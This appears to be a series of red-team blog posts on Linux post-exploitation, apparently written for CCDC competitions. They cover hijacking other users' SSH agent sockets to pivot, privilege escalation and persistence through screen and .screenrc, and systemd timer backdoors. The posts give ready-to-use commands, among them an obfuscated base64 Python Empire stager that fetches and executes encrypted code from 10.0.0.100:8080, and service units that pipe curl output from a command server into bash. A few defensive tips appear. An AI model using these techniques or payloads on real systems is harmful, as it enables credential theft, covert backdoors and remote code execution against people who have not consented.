Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a lot of ssh tunneling in order to get access to restricted systems. This is because it doesn’t make sense to publicly expose SSH to the internet or even your general-use, internal network. Instead there might be a bastion or jump box with ssh exposed as your initial way into the environment. Once connecting to the bastion host successfully you can then connect to another system within that restricted network or maybe even repeat the process to gain access to even more restricted hosts.

In order to handle authentication across multiple systems users leverage ssh agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows for the SSH client to access these credentials via a Unix stream stock. The socket makes it so the end user doesn’t have to provide their credentials multiple times. The user can also request the SSH client retains access to the socket, when connecting to another system, by enabling agent-forwarding with the -A flag.

With SSH agent-forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The ssh agent folder is only granted privileges to the connecting user account. To see what agents are around on a given machine you can look through the /tmp directory with a command similar to:

ls /tmp -l | egrep 'ssh-.{10}$'

Finding SSH Agents

Since agent sockets are stored in /tmp and the reference to which agent to use is controled entirely by the value in the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can change their environment variable to the socket of another connected user and effectively masquerade as them on the network. In fact you would even have accesses to any of the other keys the user added to the agent. Given you have access to a shared systems root account, you could use commands like the following to impersonate the user and view a list of registered keys.

ls /tmp| egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/'ssh-.{10}$'/agent.<pid> # choose one and set appropriate values as you SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands could even all be combined into a single loop like the one bellow. However, the ability to query and leverage the credentials is dependent on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn’t necessarily happen once a session is closed.

for AGENT in $(ls /tmp| egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT);echo $AGENT $(stat -c '%U' /tmp/$AGENT);timeout 10 ssh-add -l;done;

Note: A lot of common programs like git, rsync, scp, etc also allow you yo leverage SSH agents. So if a given agent doesn’t get you access to another system, also be sure to try and use it to authenticate against common services.

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable. Then use it to try and log into other systems or services as the targeted user. Its also worth mentioning that you also be able to leverage the ssh agent and port forwarding to gain access to otherwise restricted system. I’ve created a somewhat related post about leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from. Then use that IP address to try and connect back to the users origin system. Most of the time, the users public key is added to their own systems authorized_keys file for ease of access.

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. That coupled with the fact that most of the time users don’t maintain account separation between development and production environments, makes it prime to leverage ssh agents.

Abusing screen and .screenrc to Escalate and Maintain Access

When it comes to playing the part of the hacker/red team in competitions like CCDC. I’m always looking for unique ways to gain and maintain access to systems. Lately I’ve toying with the idea of leveraging features in common administration tools instead of exploits or misconfigurations. My favorite of which is abusing screen and .screenrc features to establish a foothold.

Why screen?

The screen command is definitely something I think every Linux Administrator uses every day. The reason why is simple, its probably the best way to maintain your work or run longer jobs without the effort of creating a system service. This is because when the screen command issued it effective creates another terminal (TTY) independent of the current users session. So if the administrators session isn’t stable or its impractical to wait, the job won’t be affected.

Fun Fact: By default screens are actually allocated a TTY and spawned by the init process, not the current user. So the screen process, TTY, and child processes won’t show in user level process listings or the standard last, w, or who command outputs. Instead you can use the who command with the -a (all) option to also display TTYs spawned by init.

Abusing screen and .screenrc via abandoned screens

Given that the most common use case for the screen command is administrators running jobs that can’t be interrupted. Therefore it’s always worth checking to see if any screens are running when you compromise a users account. Its not that uncommon for administrators to elevate privileges or even switch users all together within a screen. If an administrator switches to root/superuser account in a screen, the screen still only allows the original spawning user access. If that’s a lower privilege user that you’ve compromised, its an easy privilege escalation case.

So you might be thinking that the administrator should have just used sudo to elevate privileges within the screen instead of switching to root/superuser. Its definitely a safer option, but not the best option because once a users password is entered for a sudo command, by default its not requested again for 15 minutes. So if you’re in the right screen at the right time, or willing to wait long enough, sudo can still be used as a means to privilege escalate as well.

You can check to see if the current user within a screen can sudo without prompt by running sudo in non-interactive mode and seeing if it errors out.

if sudo -n true 2>/dev/null; then echo "I can sudo"; else echo "I cannot sudo"; fi

Abusing screen and .screenrc via multi-user support

The alternative laid out by the developer of the screen tool is actually a rather detailed set of permissions and multi-user support for individual screens themselves. Going over the individual permissions that are available is probably out of the scope of this post. However multi-user support is actually used in cases where multi individuals need to access jobs running in a screen of a service account, but aren’t actually allowed superuser privileges.

For instances, in my consultant days we had external nmap scanning systems, all the consultants had access to scans running within screens, in case they needed to be modified or stopped. This allowed us to maintain access to all running jobs, but we weren’t required to have superuser access to switch users or elevate privileges to kill other users processes.

To use multi-user support, make sure the SUID bit is set on the screen executable and modify the individual users (~/.screenrc or global (/etc/screenrc) screenrc files. For example, if you wanted to try and maintain access to screens created by root via a compromised standard users named tester, you could include the following in /root/.screenrc file.

multiuser on
acladd tester

If screens are not being used enough to leverage changes to the .screenrc file. You can also modify one of the target users profile files to issue the screen command automatically. You can do this by adding ‘screen -RR’ to the users ~/.bashrc file or the global /etc/bashrc file. This will reattach to any existing screen or create a screen and attach to it, once login has completed.

Note: For highly secure environments its likely best to disable multi-user support in the global screenrc file. Also consider setting your global sudoers configure to timestamp_timeout=0, will require a password for every use of the sudo command. Change control and/or watchers on resource (~.*rc) and profile files might also help.

Abusing screen and .screenrc with stuff and clear

Maintaining Access with the stuff and clear technique

Leveraging multi-user support isn’t the only way of abusing screen and .screenrc to maintain access. Instead I now utilize a technique I call stuff and clear. In this technique the target users .screenrc file is modified to create a screen layer whenever a screen is executed. This arbitrary, named layer allows for the command “stuff” to send raw characters to the screen.

Luckily, the builtin printf command will handle the raw character encoding. So printf can type out shell code, send an return key press, type out the clear command, and send a final return key press. The stuff command will then effectively create the same screen pop effect that already happens when a new screen is created. So unless the user enters copy mode and scrolls up or errors occur, they are unlikely to notice.

Here is a code segment from a Empyre module I wrote for CCDC a few years ago, that does just as a described. It will write an Empyre shell to the users .screenrc file using the stuff and clear technique.

echo 'screen -t "python"' >> ~/.screenrc && printf "stuff \""'echo \\'"\"import sys,base64;exec(base64.b64decode(\\\'bU9WakhVPSdSSVRQYURSbFFwJwppbXBvcnQgc3lzLCB1cmxsaWIyO289X19pbXBvcnRfXyh7MjondXJsbGliMicsMzondXJsbGliLnJlcXVlc3QnfVtzeXMudmVyc2lvbl9pbmZvWzBdXSxmcm9tbGlzdD1bJ2J1aWxkX29wZW5lciddKS5idWlsZF9vcGVuZXIoKTtVQT0nSDNTRTIwUVlSRlZGWTFVOCc7by5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKV07YT1vLm9wZW4oJ2h0dHA6Ly8xMC4wLjAuMTAwOjgwODAvaW5kZXguYXNwJykucmVhZCgpO2tleT0nM2ViMDMwYzZhYjA5OWIwYTM1NTcxMmZlMzhkNTlmZmInO1MsaixvdXQ9cmFuZ2UoMjU2KSwwLFtdCmZvciBpIGluIHJhbmdlKDI1Nik6CiAgICBqPShqK1NbaV0rb3JkKGtleVtpJWxlbihrZXkpXSkpJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihvcmQoY2hhcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp\\\'));"'\\'"\" | python &\rclear\r"'"' >> ~/.screenrc

Fun Fact: Screen also supports not terminating windows when a screen is exited. This can be done by adding the ‘zombie kr’ line to the .screenrc file. In the case of some payload types, this would mean the shell process would still be running until an administrator killed the screen manually.

One Final Thought

Since I’m the current maintainer of linuxprivchecker, I’ve also taken the time to begin to make changes to help detect these opportunities related to abusing screen and .screenrc for privilege escalation. I hope to continue to add features to this tool and provide related blog posts like this one. These new features will likely sit in the unstable branch for some time before they make it to master. Any assistance with testing, feedback, or ideas is always welcome.

Establishing Persistence with systemd.timers

With the push to covert all of our old init style processes managers to the new cutting-edge systemd, comes a whole new set of security concerns. In several recent competitions, I was able to establish persistence with systemd.timer units. Timer units are designed to run repetitive tasks on behalf of an existing service. This is normally used to establish service watchers, in case a service were to hang of crash. However, we can take advantage of this build-in core functionality to establish near-kernel level persistence with systemd.timers. As an added bonus, it’s a bit more difficult to find then a crontab and there are several tools that can convert existing crontabs to systemd.timers.

In order to take advantage of persistence with systemd.timers, we just need write access to the /etc/systemd/system/ or /usr/lib/systemd/system/ directory. With a user with write access, normally only root, we can create a service unit file and a timer unit file. Once the files are created, we can register the timer unit with systemd and it will execute our service unit, per our timer unit schedule. Timer units can even be registered with systemd to be started at boot automatically, to maintain persistence through reboots.

Example persistence with systemd.timers

To establish persistence with systemd.timers, we first need to create a service unit. In this case I created a file called /etc/systemd/system/backdoor.service, which would connect to a web server and execute a the given command.

[Unit]
Description=Backdoor

[Service]
Type=simple
ExecStart=curl --insecure https://127.0.0.1/cmd.txt|bash

Next I created a timer unit that launches my backdoor.service every 3 mins, to execute my latest CnC commands. The following is the contents of the file, /etc/systemd/system/backdoor.timer, which I used throughout the CCDC competitions.

[Unit]
Description=Runs backdoor ever 3 mins

[Timer]
OnBootSec=5min
OnUnitActiveSec=3min
Unit=backdoor.service

[Install]
WantedBy=multi-user.target

Once those two files are created within one of the systemd unit directories, we can simple establish the persistence with systemd.timer, by starting the unit timer.

systemctl start backdoor.timer

Then to ensure the timer is automatically started a boot, tell systemd to enable the timer unit at startup.

systemctl enable backdoor.timer

As far as I can tell from my research, there isn’t any easy way to detect these types of backdoors. However, in the CCDC competition space, I highly recommend running a command like the following in a screen to identify changes to timer units.

watch -d systemctl list-timers

Example persistence with Single Service Unit

The alterative is to have a single service unit that takes advantage of an exit code of 0; to continuously restart. Bellow is an example of such a service unit file, that will just restart every 3 mins and also execute our CnC command.

[Service]
Type=simple
ExecStart=curl --insecure https://127.0.0.1/cmd.txt|bash; exit 0
Restart=always
RestartSec=180

For more detailed information see the full documentation at: https://www.freedesktop.org/software/systemd/man/ or through your local man pages.